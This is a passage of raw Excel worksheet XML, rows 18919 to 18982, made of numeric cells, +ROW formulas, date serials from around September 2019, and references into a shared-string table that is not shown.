        <v>18918</v>
      </c>
      <c r="B18919">
        <v>3918</v>
      </c>
      <c r="C18919" t="s">
        <v>25497</v>
      </c>
      <c r="D18919" s="1">
        <v>43735</v>
      </c>
      <c r="E18919" t="s">
        <v>25512</v>
      </c>
      <c r="F18919" t="s">
        <v>9975</v>
      </c>
      <c r="G18919" t="s">
        <v>30539</v>
      </c>
    </row>
    <row r="18920" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18920">
        <f t="shared" si="295"/>
        <v>18919</v>
      </c>
      <c r="B18920">
        <v>3919</v>
      </c>
      <c r="C18920" t="s">
        <v>25497</v>
      </c>
      <c r="D18920" s="1">
        <v>43728</v>
      </c>
      <c r="F18920" t="s">
        <v>9975</v>
      </c>
      <c r="G18920" t="s">
        <v>30540</v>
      </c>
    </row>
    <row r="18921" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18921">
        <f t="shared" si="295"/>
        <v>18920</v>
      </c>
      <c r="B18921">
        <v>3920</v>
      </c>
      <c r="C18921" t="s">
        <v>25497</v>
      </c>
      <c r="D18921" s="1">
        <v>43724</v>
      </c>
      <c r="F18921" t="s">
        <v>9975</v>
      </c>
      <c r="G18921" t="s">
        <v>30541</v>
      </c>
    </row>
    <row r="18922" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18922">
        <f t="shared" si="295"/>
        <v>18921</v>
      </c>
      <c r="B18922">
        <v>3921</v>
      </c>
      <c r="C18922" t="s">
        <v>25497</v>
      </c>
      <c r="D18922" s="1">
        <v>43732</v>
      </c>
      <c r="E18922" t="s">
        <v>19705</v>
      </c>
      <c r="F18922" t="s">
        <v>9975</v>
      </c>
      <c r="G18922" t="s">
        <v>30542</v>
      </c>
    </row>
    <row r="18923" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18923">
        <f t="shared" si="295"/>
        <v>18922</v>
      </c>
      <c r="B18923">
        <v>3922</v>
      </c>
      <c r="C18923" t="s">
        <v>25497</v>
      </c>
      <c r="D18923" s="1">
        <v>43710</v>
      </c>
      <c r="E18923" t="s">
        <v>25502</v>
      </c>
      <c r="F18923" t="s">
        <v>9975</v>
      </c>
      <c r="G18923" t="s">
        <v>30543</v>
      </c>
    </row>
    <row r="18924" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18924">
        <f t="shared" si="295"/>
        <v>18923</v>
      </c>
      <c r="B18924">
        <v>3923</v>
      </c>
      <c r="C18924" t="s">
        <v>25497</v>
      </c>
      <c r="D18924" s="1">
        <v>43730</v>
      </c>
      <c r="E18924" t="s">
        <v>25509</v>
      </c>
      <c r="F18924" t="s">
        <v>9975</v>
      </c>
      <c r="G18924" t="s">
        <v>30544</v>
      </c>
    </row>
    <row r="18925" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18925">
        <f t="shared" si="295"/>
        <v>18924</v>
      </c>
      <c r="B18925">
        <v>3924</v>
      </c>
      <c r="C18925" t="s">
        <v>25497</v>
      </c>
      <c r="D18925" s="1">
        <v>43718</v>
      </c>
      <c r="F18925" t="s">
        <v>9975</v>
      </c>
      <c r="G18925" t="s">
        <v>30545</v>
      </c>
    </row>
    <row r="18926" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18926">
        <f t="shared" si="295"/>
        <v>18925</v>
      </c>
      <c r="B18926">
        <v>3925</v>
      </c>
      <c r="C18926" t="s">
        <v>25497</v>
      </c>
      <c r="D18926" s="1">
        <v>43728</v>
      </c>
      <c r="E18926" t="s">
        <v>30546</v>
      </c>
      <c r="F18926" t="s">
        <v>9975</v>
      </c>
      <c r="G18926" t="s">
        <v>30547</v>
      </c>
    </row>
    <row r="18927" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18927">
        <f t="shared" si="295"/>
        <v>18926</v>
      </c>
      <c r="B18927">
        <v>3926</v>
      </c>
      <c r="C18927" t="s">
        <v>25497</v>
      </c>
      <c r="D18927" s="1">
        <v>43726</v>
      </c>
      <c r="E18927" t="s">
        <v>25509</v>
      </c>
      <c r="F18927" t="s">
        <v>10021</v>
      </c>
      <c r="G18927" t="s">
        <v>30548</v>
      </c>
    </row>
    <row r="18928" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18928">
        <f t="shared" si="295"/>
        <v>18927</v>
      </c>
      <c r="B18928">
        <v>3927</v>
      </c>
      <c r="C18928" t="s">
        <v>25497</v>
      </c>
      <c r="D18928" s="1">
        <v>43725</v>
      </c>
      <c r="F18928" t="s">
        <v>10526</v>
      </c>
      <c r="G18928" t="s">
        <v>30549</v>
      </c>
    </row>
    <row r="18929" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18929">
        <f t="shared" si="295"/>
        <v>18928</v>
      </c>
      <c r="B18929">
        <v>3928</v>
      </c>
      <c r="C18929" t="s">
        <v>25497</v>
      </c>
      <c r="D18929" s="1">
        <v>43711</v>
      </c>
      <c r="E18929" t="s">
        <v>25517</v>
      </c>
      <c r="F18929" t="s">
        <v>9975</v>
      </c>
      <c r="G18929" t="s">
        <v>30550</v>
      </c>
    </row>
    <row r="18930" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18930">
        <f t="shared" si="295"/>
        <v>18929</v>
      </c>
      <c r="B18930">
        <v>3929</v>
      </c>
      <c r="C18930" t="s">
        <v>25497</v>
      </c>
      <c r="D18930" s="1">
        <v>43725</v>
      </c>
      <c r="E18930" t="s">
        <v>30551</v>
      </c>
      <c r="F18930" t="s">
        <v>9975</v>
      </c>
      <c r="G18930" t="s">
        <v>30552</v>
      </c>
    </row>
    <row r="18931" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18931">
        <f t="shared" si="295"/>
        <v>18930</v>
      </c>
      <c r="B18931">
        <v>3930</v>
      </c>
      <c r="C18931" t="s">
        <v>25497</v>
      </c>
      <c r="D18931" s="1">
        <v>43717</v>
      </c>
      <c r="E18931" t="s">
        <v>25774</v>
      </c>
      <c r="F18931" t="s">
        <v>9975</v>
      </c>
      <c r="G18931" t="s">
        <v>30553</v>
      </c>
    </row>
    <row r="18932" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18932">
        <f t="shared" si="295"/>
        <v>18931</v>
      </c>
      <c r="B18932">
        <v>3931</v>
      </c>
      <c r="C18932" t="s">
        <v>25497</v>
      </c>
      <c r="D18932" s="1">
        <v>43709</v>
      </c>
      <c r="F18932" t="s">
        <v>9975</v>
      </c>
      <c r="G18932" t="s">
        <v>30554</v>
      </c>
    </row>
    <row r="18933" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18933">
        <f t="shared" si="295"/>
        <v>18932</v>
      </c>
      <c r="B18933">
        <v>3932</v>
      </c>
      <c r="C18933" t="s">
        <v>25497</v>
      </c>
      <c r="D18933" s="1">
        <v>43715</v>
      </c>
      <c r="F18933" t="s">
        <v>9975</v>
      </c>
      <c r="G18933" t="s">
        <v>30555</v>
      </c>
    </row>
    <row r="18934" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18934">
        <f t="shared" si="295"/>
        <v>18933</v>
      </c>
      <c r="B18934">
        <v>3933</v>
      </c>
      <c r="C18934" t="s">
        <v>25497</v>
      </c>
      <c r="D18934" s="1">
        <v>43733</v>
      </c>
      <c r="E18934" t="s">
        <v>25723</v>
      </c>
      <c r="F18934" t="s">
        <v>9975</v>
      </c>
      <c r="G18934" t="s">
        <v>25724</v>
      </c>
    </row>
    <row r="18935" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18935">
        <f t="shared" si="295"/>
        <v>18934</v>
      </c>
      <c r="B18935">
        <v>3934</v>
      </c>
      <c r="C18935" t="s">
        <v>25497</v>
      </c>
      <c r="D18935" s="1">
        <v>43733</v>
      </c>
      <c r="F18935" t="s">
        <v>10526</v>
      </c>
      <c r="G18935" t="s">
        <v>30556</v>
      </c>
    </row>
    <row r="18936" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18936">
        <f t="shared" si="295"/>
        <v>18935</v>
      </c>
      <c r="B18936">
        <v>3935</v>
      </c>
      <c r="C18936" t="s">
        <v>25497</v>
      </c>
      <c r="D18936" s="1">
        <v>43714</v>
      </c>
      <c r="F18936" t="s">
        <v>10021</v>
      </c>
      <c r="G18936" t="s">
        <v>30557</v>
      </c>
    </row>
    <row r="18937" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18937">
        <f t="shared" si="295"/>
        <v>18936</v>
      </c>
      <c r="B18937">
        <v>3936</v>
      </c>
      <c r="C18937" t="s">
        <v>25497</v>
      </c>
      <c r="D18937" s="1">
        <v>43731</v>
      </c>
      <c r="E18937" t="s">
        <v>30558</v>
      </c>
      <c r="F18937" t="s">
        <v>9975</v>
      </c>
      <c r="G18937" t="s">
        <v>30559</v>
      </c>
    </row>
    <row r="18938" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18938">
        <f t="shared" si="295"/>
        <v>18937</v>
      </c>
      <c r="B18938">
        <v>3937</v>
      </c>
      <c r="C18938" t="s">
        <v>25497</v>
      </c>
      <c r="D18938" s="1">
        <v>43737</v>
      </c>
      <c r="E18938" t="s">
        <v>25517</v>
      </c>
      <c r="F18938" t="s">
        <v>9975</v>
      </c>
      <c r="G18938" t="s">
        <v>30560</v>
      </c>
    </row>
    <row r="18939" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18939">
        <f t="shared" si="295"/>
        <v>18938</v>
      </c>
      <c r="B18939">
        <v>3938</v>
      </c>
      <c r="C18939" t="s">
        <v>25497</v>
      </c>
      <c r="D18939" s="1">
        <v>43729</v>
      </c>
      <c r="F18939" t="s">
        <v>9975</v>
      </c>
      <c r="G18939" t="s">
        <v>30561</v>
      </c>
    </row>
    <row r="18940" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18940">
        <f t="shared" si="295"/>
        <v>18939</v>
      </c>
      <c r="B18940">
        <v>3939</v>
      </c>
      <c r="C18940" t="s">
        <v>25497</v>
      </c>
      <c r="D18940" s="1">
        <v>43737</v>
      </c>
      <c r="E18940" t="s">
        <v>25774</v>
      </c>
      <c r="F18940" t="s">
        <v>9975</v>
      </c>
      <c r="G18940" t="s">
        <v>30562</v>
      </c>
    </row>
    <row r="18941" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18941">
        <f t="shared" si="295"/>
        <v>18940</v>
      </c>
      <c r="B18941">
        <v>3940</v>
      </c>
      <c r="C18941" t="s">
        <v>25497</v>
      </c>
      <c r="D18941" s="1">
        <v>43732</v>
      </c>
      <c r="E18941" t="s">
        <v>25942</v>
      </c>
      <c r="F18941" t="s">
        <v>9975</v>
      </c>
      <c r="G18941" t="s">
        <v>30563</v>
      </c>
    </row>
    <row r="18942" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18942">
        <f t="shared" si="295"/>
        <v>18941</v>
      </c>
      <c r="B18942">
        <v>3941</v>
      </c>
      <c r="C18942" t="s">
        <v>25497</v>
      </c>
      <c r="D18942" s="1">
        <v>43714</v>
      </c>
      <c r="E18942" t="s">
        <v>30564</v>
      </c>
      <c r="F18942" t="s">
        <v>10526</v>
      </c>
      <c r="G18942" t="s">
        <v>30565</v>
      </c>
    </row>
    <row r="18943" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18943">
        <f t="shared" si="295"/>
        <v>18942</v>
      </c>
      <c r="B18943">
        <v>3942</v>
      </c>
      <c r="C18943" t="s">
        <v>25497</v>
      </c>
      <c r="D18943" s="1">
        <v>43734</v>
      </c>
      <c r="F18943" t="s">
        <v>9975</v>
      </c>
      <c r="G18943" t="s">
        <v>30566</v>
      </c>
    </row>
    <row r="18944" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18944">
        <f t="shared" si="295"/>
        <v>18943</v>
      </c>
      <c r="B18944">
        <v>3943</v>
      </c>
      <c r="C18944" t="s">
        <v>25497</v>
      </c>
      <c r="D18944" s="1">
        <v>43713</v>
      </c>
      <c r="E18944" t="s">
        <v>25517</v>
      </c>
      <c r="F18944" t="s">
        <v>9975</v>
      </c>
      <c r="G18944" t="s">
        <v>30567</v>
      </c>
    </row>
    <row r="18945" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18945">
        <f t="shared" si="295"/>
        <v>18944</v>
      </c>
      <c r="B18945">
        <v>3944</v>
      </c>
      <c r="C18945" t="s">
        <v>25497</v>
      </c>
      <c r="D18945" s="1">
        <v>43732</v>
      </c>
      <c r="F18945" t="s">
        <v>9975</v>
      </c>
      <c r="G18945" t="s">
        <v>30568</v>
      </c>
    </row>
    <row r="18946" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18946">
        <f t="shared" si="295"/>
        <v>18945</v>
      </c>
      <c r="B18946">
        <v>3945</v>
      </c>
      <c r="C18946" t="s">
        <v>25497</v>
      </c>
      <c r="D18946" s="1">
        <v>43731</v>
      </c>
      <c r="E18946" t="s">
        <v>25509</v>
      </c>
      <c r="F18946" t="s">
        <v>10021</v>
      </c>
      <c r="G18946" t="s">
        <v>30569</v>
      </c>
    </row>
    <row r="18947" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18947">
        <f t="shared" ref="A18947:A19010" si="296">+ROW(A18946)</f>
        <v>18946</v>
      </c>
      <c r="B18947">
        <v>3946</v>
      </c>
      <c r="C18947" t="s">
        <v>25497</v>
      </c>
      <c r="D18947" s="1">
        <v>43720</v>
      </c>
      <c r="F18947" t="s">
        <v>9978</v>
      </c>
      <c r="G18947" t="s">
        <v>30570</v>
      </c>
    </row>
    <row r="18948" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18948">
        <f t="shared" si="296"/>
        <v>18947</v>
      </c>
      <c r="B18948">
        <v>3947</v>
      </c>
      <c r="C18948" t="s">
        <v>25497</v>
      </c>
      <c r="D18948" s="1">
        <v>43712</v>
      </c>
      <c r="E18948" t="s">
        <v>30571</v>
      </c>
      <c r="F18948" t="s">
        <v>9975</v>
      </c>
      <c r="G18948" t="s">
        <v>30572</v>
      </c>
    </row>
    <row r="18949" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18949">
        <f t="shared" si="296"/>
        <v>18948</v>
      </c>
      <c r="B18949">
        <v>3948</v>
      </c>
      <c r="C18949" t="s">
        <v>25497</v>
      </c>
      <c r="D18949" s="1">
        <v>43726</v>
      </c>
      <c r="F18949" t="s">
        <v>9975</v>
      </c>
      <c r="G18949" t="s">
        <v>30573</v>
      </c>
    </row>
    <row r="18950" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18950">
        <f t="shared" si="296"/>
        <v>18949</v>
      </c>
      <c r="B18950">
        <v>3949</v>
      </c>
      <c r="C18950" t="s">
        <v>25497</v>
      </c>
      <c r="D18950" s="1">
        <v>43712</v>
      </c>
      <c r="E18950" t="s">
        <v>30574</v>
      </c>
      <c r="F18950" t="s">
        <v>9975</v>
      </c>
      <c r="G18950" t="s">
        <v>30575</v>
      </c>
    </row>
    <row r="18951" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18951">
        <f t="shared" si="296"/>
        <v>18950</v>
      </c>
      <c r="B18951">
        <v>3950</v>
      </c>
      <c r="C18951" t="s">
        <v>25497</v>
      </c>
      <c r="D18951" s="1">
        <v>43734</v>
      </c>
      <c r="E18951" t="s">
        <v>25504</v>
      </c>
      <c r="F18951" t="s">
        <v>9975</v>
      </c>
      <c r="G18951" t="s">
        <v>30576</v>
      </c>
    </row>
    <row r="18952" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18952">
        <f t="shared" si="296"/>
        <v>18951</v>
      </c>
      <c r="B18952">
        <v>3951</v>
      </c>
      <c r="C18952" t="s">
        <v>25497</v>
      </c>
      <c r="D18952" s="1">
        <v>43737</v>
      </c>
      <c r="E18952" t="s">
        <v>30577</v>
      </c>
      <c r="F18952" t="s">
        <v>9975</v>
      </c>
      <c r="G18952" t="s">
        <v>30578</v>
      </c>
    </row>
    <row r="18953" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18953">
        <f t="shared" si="296"/>
        <v>18952</v>
      </c>
      <c r="B18953">
        <v>3952</v>
      </c>
      <c r="C18953" t="s">
        <v>25497</v>
      </c>
      <c r="D18953" s="1">
        <v>43727</v>
      </c>
      <c r="E18953" t="s">
        <v>25592</v>
      </c>
      <c r="F18953" t="s">
        <v>9975</v>
      </c>
      <c r="G18953" t="s">
        <v>30579</v>
      </c>
    </row>
    <row r="18954" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18954">
        <f t="shared" si="296"/>
        <v>18953</v>
      </c>
      <c r="B18954">
        <v>3953</v>
      </c>
      <c r="C18954" t="s">
        <v>25497</v>
      </c>
      <c r="D18954" s="1">
        <v>43724</v>
      </c>
      <c r="E18954" t="s">
        <v>30580</v>
      </c>
      <c r="F18954" t="s">
        <v>9975</v>
      </c>
      <c r="G18954" t="s">
        <v>30581</v>
      </c>
    </row>
    <row r="18955" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18955">
        <f t="shared" si="296"/>
        <v>18954</v>
      </c>
      <c r="B18955">
        <v>3954</v>
      </c>
      <c r="C18955" t="s">
        <v>25497</v>
      </c>
      <c r="D18955" s="1">
        <v>43738</v>
      </c>
      <c r="F18955" t="s">
        <v>10021</v>
      </c>
      <c r="G18955" t="s">
        <v>30582</v>
      </c>
    </row>
    <row r="18956" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18956">
        <f t="shared" si="296"/>
        <v>18955</v>
      </c>
      <c r="B18956">
        <v>3955</v>
      </c>
      <c r="C18956" t="s">
        <v>25497</v>
      </c>
      <c r="D18956" s="1">
        <v>43717</v>
      </c>
      <c r="E18956" t="s">
        <v>30583</v>
      </c>
      <c r="F18956" t="s">
        <v>9975</v>
      </c>
      <c r="G18956" t="s">
        <v>30584</v>
      </c>
    </row>
    <row r="18957" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18957">
        <f t="shared" si="296"/>
        <v>18956</v>
      </c>
      <c r="B18957">
        <v>3956</v>
      </c>
      <c r="C18957" t="s">
        <v>25497</v>
      </c>
      <c r="D18957" s="1">
        <v>43724</v>
      </c>
      <c r="E18957" t="s">
        <v>30585</v>
      </c>
      <c r="F18957" t="s">
        <v>9978</v>
      </c>
      <c r="G18957" t="s">
        <v>30586</v>
      </c>
    </row>
    <row r="18958" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18958">
        <f t="shared" si="296"/>
        <v>18957</v>
      </c>
      <c r="B18958">
        <v>3957</v>
      </c>
      <c r="C18958" t="s">
        <v>25497</v>
      </c>
      <c r="D18958" s="1">
        <v>43733</v>
      </c>
      <c r="E18958" t="s">
        <v>25512</v>
      </c>
      <c r="F18958" t="s">
        <v>9975</v>
      </c>
      <c r="G18958" t="s">
        <v>30587</v>
      </c>
    </row>
    <row r="18959" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18959">
        <f t="shared" si="296"/>
        <v>18958</v>
      </c>
      <c r="B18959">
        <v>3958</v>
      </c>
      <c r="C18959" t="s">
        <v>25497</v>
      </c>
      <c r="D18959" s="1">
        <v>43718</v>
      </c>
      <c r="F18959" t="s">
        <v>9975</v>
      </c>
      <c r="G18959" t="s">
        <v>30588</v>
      </c>
    </row>
    <row r="18960" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18960">
        <f t="shared" si="296"/>
        <v>18959</v>
      </c>
      <c r="B18960">
        <v>3959</v>
      </c>
      <c r="C18960" t="s">
        <v>25497</v>
      </c>
      <c r="D18960" s="1">
        <v>43731</v>
      </c>
      <c r="E18960" t="s">
        <v>30589</v>
      </c>
      <c r="F18960" t="s">
        <v>9975</v>
      </c>
      <c r="G18960" t="s">
        <v>30590</v>
      </c>
    </row>
    <row r="18961" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18961">
        <f t="shared" si="296"/>
        <v>18960</v>
      </c>
      <c r="B18961">
        <v>3960</v>
      </c>
      <c r="C18961" t="s">
        <v>25497</v>
      </c>
      <c r="D18961" s="1">
        <v>43735</v>
      </c>
      <c r="E18961" t="s">
        <v>25942</v>
      </c>
      <c r="F18961" t="s">
        <v>9975</v>
      </c>
      <c r="G18961" t="s">
        <v>30591</v>
      </c>
    </row>
    <row r="18962" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18962">
        <f t="shared" si="296"/>
        <v>18961</v>
      </c>
      <c r="B18962">
        <v>3961</v>
      </c>
      <c r="C18962" t="s">
        <v>25497</v>
      </c>
      <c r="D18962" s="1">
        <v>43711</v>
      </c>
      <c r="E18962" t="s">
        <v>25517</v>
      </c>
      <c r="F18962" t="s">
        <v>9975</v>
      </c>
      <c r="G18962" t="s">
        <v>30592</v>
      </c>
    </row>
    <row r="18963" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18963">
        <f t="shared" si="296"/>
        <v>18962</v>
      </c>
      <c r="B18963">
        <v>3962</v>
      </c>
      <c r="C18963" t="s">
        <v>25497</v>
      </c>
      <c r="D18963" s="1">
        <v>43731</v>
      </c>
      <c r="F18963" t="s">
        <v>10526</v>
      </c>
      <c r="G18963" t="s">
        <v>30593</v>
      </c>
    </row>
    <row r="18964" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18964">
        <f t="shared" si="296"/>
        <v>18963</v>
      </c>
      <c r="B18964">
        <v>3963</v>
      </c>
      <c r="C18964" t="s">
        <v>25497</v>
      </c>
      <c r="D18964" s="1">
        <v>43710</v>
      </c>
      <c r="E18964" t="s">
        <v>30594</v>
      </c>
      <c r="F18964" t="s">
        <v>9975</v>
      </c>
      <c r="G18964" t="s">
        <v>30595</v>
      </c>
    </row>
    <row r="18965" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18965">
        <f t="shared" si="296"/>
        <v>18964</v>
      </c>
      <c r="B18965">
        <v>3964</v>
      </c>
      <c r="C18965" t="s">
        <v>25497</v>
      </c>
      <c r="D18965" s="1">
        <v>43711</v>
      </c>
      <c r="E18965" t="s">
        <v>30596</v>
      </c>
      <c r="F18965" t="s">
        <v>10526</v>
      </c>
      <c r="G18965" t="s">
        <v>30597</v>
      </c>
    </row>
    <row r="18966" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18966">
        <f t="shared" si="296"/>
        <v>18965</v>
      </c>
      <c r="B18966">
        <v>3965</v>
      </c>
      <c r="C18966" t="s">
        <v>25497</v>
      </c>
      <c r="D18966" s="1">
        <v>43728</v>
      </c>
      <c r="E18966" t="s">
        <v>28006</v>
      </c>
      <c r="F18966" t="s">
        <v>9975</v>
      </c>
      <c r="G18966" t="s">
        <v>30598</v>
      </c>
    </row>
    <row r="18967" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18967">
        <f t="shared" si="296"/>
        <v>18966</v>
      </c>
      <c r="B18967">
        <v>3966</v>
      </c>
      <c r="C18967" t="s">
        <v>25497</v>
      </c>
      <c r="D18967" s="1">
        <v>43712</v>
      </c>
      <c r="F18967" t="s">
        <v>9975</v>
      </c>
      <c r="G18967" t="s">
        <v>30599</v>
      </c>
    </row>
    <row r="18968" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18968">
        <f t="shared" si="296"/>
        <v>18967</v>
      </c>
      <c r="B18968">
        <v>3967</v>
      </c>
      <c r="C18968" t="s">
        <v>25497</v>
      </c>
      <c r="D18968" s="1">
        <v>43714</v>
      </c>
      <c r="F18968" t="s">
        <v>9978</v>
      </c>
      <c r="G18968" t="s">
        <v>30600</v>
      </c>
    </row>
    <row r="18969" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18969">
        <f t="shared" si="296"/>
        <v>18968</v>
      </c>
      <c r="B18969">
        <v>3968</v>
      </c>
      <c r="C18969" t="s">
        <v>25497</v>
      </c>
      <c r="D18969" s="1">
        <v>43730</v>
      </c>
      <c r="F18969" t="s">
        <v>9975</v>
      </c>
      <c r="G18969" t="s">
        <v>30601</v>
      </c>
    </row>
    <row r="18970" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18970">
        <f t="shared" si="296"/>
        <v>18969</v>
      </c>
      <c r="B18970">
        <v>3969</v>
      </c>
      <c r="C18970" t="s">
        <v>25497</v>
      </c>
      <c r="D18970" s="1">
        <v>43734</v>
      </c>
      <c r="F18970" t="s">
        <v>10526</v>
      </c>
      <c r="G18970" t="s">
        <v>30602</v>
      </c>
    </row>
    <row r="18971" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18971">
        <f t="shared" si="296"/>
        <v>18970</v>
      </c>
      <c r="B18971">
        <v>3970</v>
      </c>
      <c r="C18971" t="s">
        <v>25497</v>
      </c>
      <c r="D18971" s="1">
        <v>43719</v>
      </c>
      <c r="F18971" t="s">
        <v>10021</v>
      </c>
      <c r="G18971" t="s">
        <v>30603</v>
      </c>
    </row>
    <row r="18972" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18972">
        <f t="shared" si="296"/>
        <v>18971</v>
      </c>
      <c r="B18972">
        <v>3971</v>
      </c>
      <c r="C18972" t="s">
        <v>25497</v>
      </c>
      <c r="D18972" s="1">
        <v>43724</v>
      </c>
      <c r="E18972" t="s">
        <v>30604</v>
      </c>
      <c r="F18972" t="s">
        <v>10021</v>
      </c>
      <c r="G18972" t="s">
        <v>30605</v>
      </c>
    </row>
    <row r="18973" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18973">
        <f t="shared" si="296"/>
        <v>18972</v>
      </c>
      <c r="B18973">
        <v>3972</v>
      </c>
      <c r="C18973" t="s">
        <v>25497</v>
      </c>
      <c r="D18973" s="1">
        <v>43734</v>
      </c>
      <c r="E18973" t="s">
        <v>30606</v>
      </c>
      <c r="F18973" t="s">
        <v>9975</v>
      </c>
      <c r="G18973" t="s">
        <v>30607</v>
      </c>
    </row>
    <row r="18974" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18974">
        <f t="shared" si="296"/>
        <v>18973</v>
      </c>
      <c r="B18974">
        <v>3973</v>
      </c>
      <c r="C18974" t="s">
        <v>25497</v>
      </c>
      <c r="D18974" s="1">
        <v>43733</v>
      </c>
      <c r="F18974" t="s">
        <v>9975</v>
      </c>
      <c r="G18974" t="s">
        <v>30608</v>
      </c>
    </row>
    <row r="18975" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18975">
        <f t="shared" si="296"/>
        <v>18974</v>
      </c>
      <c r="B18975">
        <v>3974</v>
      </c>
      <c r="C18975" t="s">
        <v>25497</v>
      </c>
      <c r="D18975" s="1">
        <v>43718</v>
      </c>
      <c r="E18975" t="s">
        <v>30609</v>
      </c>
      <c r="F18975" t="s">
        <v>9975</v>
      </c>
      <c r="G18975" t="s">
        <v>30610</v>
      </c>
    </row>
    <row r="18976" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18976">
        <f t="shared" si="296"/>
        <v>18975</v>
      </c>
      <c r="B18976">
        <v>3975</v>
      </c>
      <c r="C18976" t="s">
        <v>25497</v>
      </c>
      <c r="D18976" s="1">
        <v>43715</v>
      </c>
      <c r="E18976" t="s">
        <v>28187</v>
      </c>
      <c r="F18976" t="s">
        <v>10526</v>
      </c>
      <c r="G18976" t="s">
        <v>30611</v>
      </c>
    </row>
    <row r="18977" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18977">
        <f t="shared" si="296"/>
        <v>18976</v>
      </c>
      <c r="B18977">
        <v>3976</v>
      </c>
      <c r="C18977" t="s">
        <v>25497</v>
      </c>
      <c r="D18977" s="1">
        <v>43728</v>
      </c>
      <c r="F18977" t="s">
        <v>9978</v>
      </c>
      <c r="G18977" t="s">
        <v>30612</v>
      </c>
    </row>
    <row r="18978" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18978">
        <f t="shared" si="296"/>
        <v>18977</v>
      </c>
      <c r="B18978">
        <v>3977</v>
      </c>
      <c r="C18978" t="s">
        <v>25497</v>
      </c>
      <c r="D18978" s="1">
        <v>43714</v>
      </c>
      <c r="F18978" t="s">
        <v>9975</v>
      </c>
      <c r="G18978" t="s">
        <v>30613</v>
      </c>
    </row>
    <row r="18979" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18979">
        <f t="shared" si="296"/>
        <v>18978</v>
      </c>
      <c r="B18979">
        <v>3978</v>
      </c>
      <c r="C18979" t="s">
        <v>25497</v>
      </c>
      <c r="D18979" s="1">
        <v>43728</v>
      </c>
      <c r="F18979" t="s">
        <v>9975</v>
      </c>
      <c r="G18979" t="s">
        <v>30614</v>
      </c>
    </row>
    <row r="18980" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18980">
        <f t="shared" si="296"/>
        <v>18979</v>
      </c>
      <c r="B18980">
        <v>3979</v>
      </c>
      <c r="C18980" t="s">
        <v>25497</v>
      </c>
      <c r="D18980" s="1">
        <v>43713</v>
      </c>
      <c r="E18980" t="s">
        <v>30615</v>
      </c>
      <c r="F18980" t="s">
        <v>9975</v>
      </c>
      <c r="G18980" t="s">
        <v>30616</v>
      </c>
    </row>
    <row r="18981" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18981">
        <f t="shared" si="296"/>
        <v>18980</v>
      </c>
      <c r="B18981">
        <v>3980</v>
      </c>
      <c r="C18981" t="s">
        <v>25497</v>
      </c>
      <c r="D18981" s="1">
        <v>43720</v>
      </c>
      <c r="E18981" t="s">
        <v>30617</v>
      </c>
      <c r="F18981" t="s">
        <v>9975</v>
      </c>
      <c r="G18981" t="s">
        <v>30618</v>
      </c>
    </row>
    <row r="18982" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18982">
        <f t="shared" si="296"/>
        <v>18981</v>
      </c>
      <c r="B18982">
        <v>3981</v>
      </c>
      <c r="C18982" t="s">
        <v>25497</v>
      </c>
      <c r="D18982" s="1">
        <v>43733</v>
      </c>
      <c r="E18982" t="s">
        <v>30619</v>
      </c>
      <c r="F18982" t="s">
        <v>9978</v>
      </c>
      <c r="G18982" t="s">
        <v>30620</v>
      </c>
    </row>
